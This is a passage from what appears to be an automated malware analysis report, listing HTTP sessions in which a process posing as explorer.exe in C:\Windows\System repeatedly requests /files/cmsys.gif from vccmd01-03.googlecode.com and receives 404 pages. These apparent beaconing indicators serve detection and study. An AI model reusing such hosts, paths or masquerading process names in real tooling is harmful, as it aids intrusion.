                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:57.484405041 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    55192.168.2.560699142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:57.781251907 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:58.708314896 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:58 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:58.708441019 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    56192.168.2.56070164.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:00.915157080 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:01.850070000 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:01 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:01.850105047 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    57192.168.2.560702108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:02.118575096 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:03.036520958 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:02 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:03.036562920 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    58192.168.2.560703142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:03.255206108 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.214234114 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:04 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.214267969 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    59192.168.2.56070564.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:06.147283077 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:07.077585936 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:06 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:07.077644110 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    60192.168.2.560706108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:07.326175928 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:09.189424992 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:08 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
